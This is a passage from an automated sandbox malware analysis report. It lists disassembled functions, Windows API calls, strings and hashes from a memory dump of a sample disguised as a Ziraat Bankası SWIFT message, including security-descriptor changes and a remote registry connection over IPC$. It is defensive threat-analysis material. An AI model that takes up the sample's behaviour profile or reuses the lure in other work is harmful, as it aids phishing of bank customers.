GlobalFree.KERNEL32(00000000), ref: 000EE7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 000EE809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 000EE834
DeleteObject.GDI32(00000000), ref: 000EE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 000EE872

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 204d9e302a9b2fffda784a65f15e1f0c7306bf5a2e76be529389d488633a9340
Instruction ID: e218d44040ed04a4b8056af12b001486a84baae7bef9c91cec848b6b0d8aa952
Opcode Fuzzy Hash: 204d9e302a9b2fffda784a65f15e1f0c7306bf5a2e76be529389d488633a9340
Instruction Fuzzy Hash: 72414A75600249EFDB119FA5EC48EAE7BB8FF89711F108058F949E7260DB709D80CB20

Function 000D05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 000D076F
_wcscat.LIBCMT ref: 000D0787
_wcscat.LIBCMT ref: 000D0799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000D07AE
SetCurrentDirectoryW.KERNEL32(?), ref: 000D07C2
GetFileAttributesW.KERNEL32(?), ref: 000D07DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 000D07F4
SetCurrentDirectoryW.KERNEL32(?), ref: 000D0806

Strings

*.*, xrefs: 000D0845

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 58a2f29cff1e057425671b58204d40c9f1949cf52adec9ec9ce09f70c5f4e3b7
Instruction ID: 1efa728a12e587a0bb729f2c0f75467abc4b52ebe62955facaca7b649c9f2f38
Opcode Fuzzy Hash: 58a2f29cff1e057425671b58204d40c9f1949cf52adec9ec9ce09f70c5f4e3b7
Instruction Fuzzy Hash: 8E818F715043019FCB64EF64C845AAEB7E8BF88314F14882FF889D7351EB30D9548BA2

Function 000EEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000EEF3B
GetFocus.USER32 ref: 000EEF4B
GetDlgCtrlID.USER32(00000000), ref: 000EEF56
_memset.LIBCMT ref: 000EF081
GetMenuItemInfoW.USER32 ref: 000EF0AC
GetMenuItemCount.USER32(00000000), ref: 000EF0CC
GetMenuItemID.USER32(?,00000000), ref: 000EF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 000EF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 000EF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 000EF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 000EF1C8

Strings

0, xrefs: 000EF079

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 72f802241fea4779e91adb5c0f57fe41c5d90cb20132ddd384dd68859950b96e
Instruction ID: 1a67518c71fdaf9279fed8396b8247491913bbf7794e71ce1fd3c762fafe49e5
Opcode Fuzzy Hash: 72f802241fea4779e91adb5c0f57fe41c5d90cb20132ddd384dd68859950b96e
Instruction Fuzzy Hash: B9818F71608386AFDB20CF16DC84ABBBBE5FB88314F00456EF998A7291D770D941CB52

Function 000BA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000BABD7
Part of subcall function 000BABBB: GetLastError.KERNEL32(?,000BA69F,?,?,?), ref: 000BABE1
Part of subcall function 000BABBB: GetProcessHeap.KERNEL32(00000008,?,?,000BA69F,?,?,?), ref: 000BABF0
Part of subcall function 000BABBB: HeapAlloc.KERNEL32(00000000,?,000BA69F,?,?,?), ref: 000BABF7
Part of subcall function 000BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000BAC0E

Part of subcall function 000BAC56: GetProcessHeap.KERNEL32(00000008,000BA6B5,00000000,00000000,?,000BA6B5,?), ref: 000BAC62
Part of subcall function 000BAC56: HeapAlloc.KERNEL32(00000000,?,000BA6B5,?), ref: 000BAC69
Part of subcall function 000BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,000BA6B5,?), ref: 000BAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 000BA8CB
_memset.LIBCMT ref: 000BA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 000BA8FF
GetLengthSid.ADVAPI32(?), ref: 000BA910
GetAce.ADVAPI32(?,00000000,?), ref: 000BA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000BA969
GetLengthSid.ADVAPI32(?), ref: 000BA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000BA995
HeapAlloc.KERNEL32(00000000), ref: 000BA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 000BA9BD
CopySid.ADVAPI32(00000000), ref: 000BA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 000BA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 000BAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 000BAA2F

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: fd13d009f408b70d030cfe318a7e04540ea111df18132fdce99ba36fd227fc3a
Instruction ID: 5d023ae6088d67c97ebec3e405fd36c83fc342feb6a4aafc5fdaf1c09aed1a9b
Opcode Fuzzy Hash: fd13d009f408b70d030cfe318a7e04540ea111df18132fdce99ba36fd227fc3a
Instruction Fuzzy Hash: 94519DB1A00209AFDF10CFA0DD85EEEBBB9FF05300F048129F815A7291DB749A46CB61

Function 000D9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 000D9E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 000D9E42
CreateCompatibleDC.GDI32(?), ref: 000D9E4E
SelectObject.GDI32(00000000,?), ref: 000D9E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 000D9EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 000D9EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 000D9F0F
SelectObject.GDI32(00000006,?), ref: 000D9F17
DeleteObject.GDI32(?), ref: 000D9F20
DeleteDC.GDI32(00000006), ref: 000D9F27
ReleaseDC.USER32(00000000,?), ref: 000D9F32

Strings

(, xrefs: 000D9ED7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 5e0307ab2e68f6c8322a3e764936732ca791371f91262eb86b179c99e2e957a0
Instruction ID: 46c5400fae92ac0a6930f9ecf281901678a467b04dc02c5a56e1d09fce38a49b
Opcode Fuzzy Hash: 5e0307ab2e68f6c8322a3e764936732ca791371f91262eb86b179c99e2e957a0
Instruction Fuzzy Hash: CF512B75900309AFCB14CFA8D885EAEBBB9EF48710F14851EF99997350D771A941CB60

Function 000CCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 000CCCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 000CCCC5
__swprintf.LIBCMT ref: 000CCD1E
__swprintf.LIBCMT ref: 000CCD37
_wprintf.LIBCMT ref: 000CCDED
_wprintf.LIBCMT ref: 000CCE0B

Strings

Error: , xrefs: 000CCDB5
^ ERROR, xrefs: 000CCD8F
"%s" (%d) : ==> %s:%s%s, xrefs: 000CCDE8
"%s" (%d) : ==> %s:, xrefs: 000CCE06
Line %d (File "%s"):, xrefs: 000CCD18, 000CCD31

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 516735db13d398392c440401c9fea175a95274f825947f6c3318ee75bdc82c59
Instruction ID: 4dfa30844631e4d6d99461afdec54776d616ba90535cdd288445709d9482147f
Opcode Fuzzy Hash: 516735db13d398392c440401c9fea175a95274f825947f6c3318ee75bdc82c59
Instruction Fuzzy Hash: E2515A31800609BADF15FBE0CD46EEEB7B8BF05344F10016AF505721A2EB316E99DB61

Function 000CCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 000CCA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 000CCAB0
__swprintf.LIBCMT ref: 000CCB09
__swprintf.LIBCMT ref: 000CCB22
_wprintf.LIBCMT ref: 000CCBCD
_wprintf.LIBCMT ref: 000CCBEB

Strings

Error: , xrefs: 000CCB95
"%s" (%d) : ==> %s:%s%s, xrefs: 000CCBC8
^ ERROR , xrefs: 000CCB64
"%s" (%d) : ==> %s:, xrefs: 000CCBE6
Line %d (File "%s"):, xrefs: 000CCB03, 000CCB1C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: baa1aacddd199245252d3137608b94aaaef822d64e366b6f9cf2f621184595f4
Instruction ID: 9efd34c8967ce46392335639a795a73a4be224bf4ee36731cb194f72f56799f1
Opcode Fuzzy Hash: baa1aacddd199245252d3137608b94aaaef822d64e366b6f9cf2f621184595f4
Instruction Fuzzy Hash: E7515931900609AADF15FBE0DD46EEEB7B8BF05344F10006AF509721A2EB716E99DB61

Function 000C55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 000C5664
GetMenuItemCount.USER32(00141708), ref: 000C56ED
DeleteMenu.USER32(00141708,00000005,00000000,000000F5,?,?), ref: 000C577D
DeleteMenu.USER32(00141708,00000004,00000000), ref: 000C5785
DeleteMenu.USER32(00141708,00000006,00000000), ref: 000C578D
DeleteMenu.USER32(00141708,00000003,00000000), ref: 000C5795
GetMenuItemCount.USER32(00141708), ref: 000C579D
SetMenuItemInfoW.USER32(00141708,00000004,00000000,00000030), ref: 000C57D3
GetCursorPos.USER32(?), ref: 000C57DD
SetForegroundWindow.USER32(00000000), ref: 000C57E6
TrackPopupMenuEx.USER32(00141708,00000000,?,00000000,00000000,00000000), ref: 000C57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000C5805

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 5034b5a392461b404ea4ed8b4561c0351880abb6749e93d4ed0c33ec887cb823
Instruction ID: 0e23c5b721755a052185740476819edf104cf861ba58a4134f47283449a81dcf
Opcode Fuzzy Hash: 5034b5a392461b404ea4ed8b4561c0351880abb6749e93d4ed0c33ec887cb823
Instruction Fuzzy Hash: B971E478640A15BFEB209B54DC49FAEBFA5FF00369F240209F514AB1E1C7B16C90DB91

Function 0008E8A0 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 414sleepwindowtimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E959
timeGetTime.WINMM ref: 0008EBFA
Sleep.KERNEL32(00000000), ref: 000F543A

Strings

@GUI_WINHANDLE, xrefs: 000F5360
@GUI_CTRLID, xrefs: 000F5314
@GUI_CTRLHANDLE, xrefs: 000F53AC

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
API String ID: 1792118007-758534266
Opcode ID: 96771a4f619d9f4d513b2454b935df1d07bfaa01b1e9f9a334a1bea9f2b9d0dc
Instruction ID: 29b75ff84ef18d8b9ecfaa367de5bf0f8f2c7b0ce65fe8ebcc0aaa8f9ffa9427
Opcode Fuzzy Hash: 96771a4f619d9f4d513b2454b935df1d07bfaa01b1e9f9a334a1bea9f2b9d0dc
Instruction Fuzzy Hash: DAF1F7705083C49FEB65EF64C845BAA77E4BF45304F18096DF9C58B6A2D7B0E884CB52

Function 000BA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000BA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 000BA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 000BA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 000BA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 000BA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 000BA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 000BA2AB

Strings

SOFTWARE\Classes\, xrefs: 000BA17D
\IPC$, xrefs: 000BA1F3
\CLSID, xrefs: 000BA193

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 32c879196cb0662405374688ebb9eb3d2f54368ed7a99549c7d412db4286c1ed
Instruction ID: ee65695a089d61722ce35d647e25ff3ab657713f5ace5b130efa9cd534f6599e
Opcode Fuzzy Hash: 32c879196cb0662405374688ebb9eb3d2f54368ed7a99549c7d412db4286c1ed
Instruction Fuzzy Hash: 7A41F676D10229ABDF21EBA4EC85DEEB7B8BF04300F00456AF845B31A1EB719E45CB50

Function 000C25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,000F30A8,?,?,#include depth exceeded. Make sure there are no recursive includes,?,?,?,?,?,0008419E), ref: 000C25D6
LoadStringW.USER32(00000000,?,?,000F30A8), ref: 000C25DD
_wprintf.LIBCMT ref: 000C2610
__swprintf.LIBCMT ref: 000C2632
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C26A1

Strings

., xrefs: 000C2687
Error: , xrefs: 000C266F
%s (%d) : ==> %s.: %s %s, xrefs: 000C260B
Line %d (File "%s"):, xrefs: 000C2647
Line %d:, xrefs: 000C262C

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 90cd9e2abb1076509a7f50e5ff0f2f0be95b78daa3e88f88867d108e7a462970
Instruction ID: c13932b8aa71850d9f10d1c25aedd2469d9db1aab7ecd085f73bac86cb60b52b
Opcode Fuzzy Hash: 90cd9e2abb1076509a7f50e5ff0f2f0be95b78daa3e88f88867d108e7a462970
Instruction Fuzzy Hash: D2212A3180021AAFDF12BB90CC4AFEE7B79BF19304F044469F555660A3EB71A668DB61

Function 000C7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 000C7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 000C7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000C7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 000C7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 000C7B8C

Strings

play PlayMe, xrefs: 000C7B87
status PlayMe mode, xrefs: 000C7B3D
alias PlayMe, xrefs: 000C7B1B
play PlayMe wait, xrefs: 000C7B76
close PlayMe, xrefs: 000C7B53, 000C7B80
open , xrefs: 000C7AF1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 7066c48ffab6979ef6b92c8639721bb8081b0d3196f1eb8fe9fbdfbd407c234c
Instruction ID: 31507964e54fa51d1d62b8a9726764c412056a71a046010458fe240cafd80682
Opcode Fuzzy Hash: 7066c48ffab6979ef6b92c8639721bb8081b0d3196f1eb8fe9fbdfbd407c234c
Instruction Fuzzy Hash: 4E11C4A164025979D720B3A1CC4AEFF7EBCFBD1B10F0004297465A60C2EF701E48CAB1

Function 000C778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 000C7794

Part of subcall function 0009DC38: timeGetTime.WINMM(?,75A4B400,000F58AB), ref: 0009DC3C

Sleep.KERNEL32(0000000A), ref: 000C77C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 000C77E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 000C7806
SetActiveWindow.USER32 ref: 000C7825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 000C7833
SendMessageW.USER32(00000010,00000000,00000000), ref: 000C7852
Sleep.KERNEL32(000000FA), ref: 000C785D
IsWindow.USER32 ref: 000C7869
EndDialog.USER32(00000000), ref: 000C787A

Strings

BUTTON, xrefs: 000C77F8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 3163ac02c65bedf1bc79d32dba860b8d60d75907abe9f6233f77e3e015172d41
Instruction ID: a5fb6574f62b8722afdff4cc1cb1caa00a3702bcd392178fe30ce477f23d9400
Opcode Fuzzy Hash: 3163ac02c65bedf1bc79d32dba860b8d60d75907abe9f6233f77e3e015172d41
Instruction Fuzzy Hash: 5D216FB4248209AFE7115FA0EC89F2A7F79FB45349F400128F569829B2DFB15D84DE21

Function 000D02EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CoInitialize.OLE32(00000000), ref: 000D034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 000D03DE
SHGetDesktopFolder.SHELL32(?), ref: 000D03F2
CoCreateInstance.OLE32(0010DA8C,00000000,00000001,00133CF8,?), ref: 000D043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 000D04AD
CoTaskMemFree.OLE32(?,?), ref: 000D0505
_memset.LIBCMT ref: 000D0542
SHBrowseForFolderW.SHELL32(?), ref: 000D057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 000D05A1
CoTaskMemFree.OLE32(00000000), ref: 000D05A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 000D05DF
CoUninitialize.OLE32(00000001,00000000), ref: 000D05E1

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

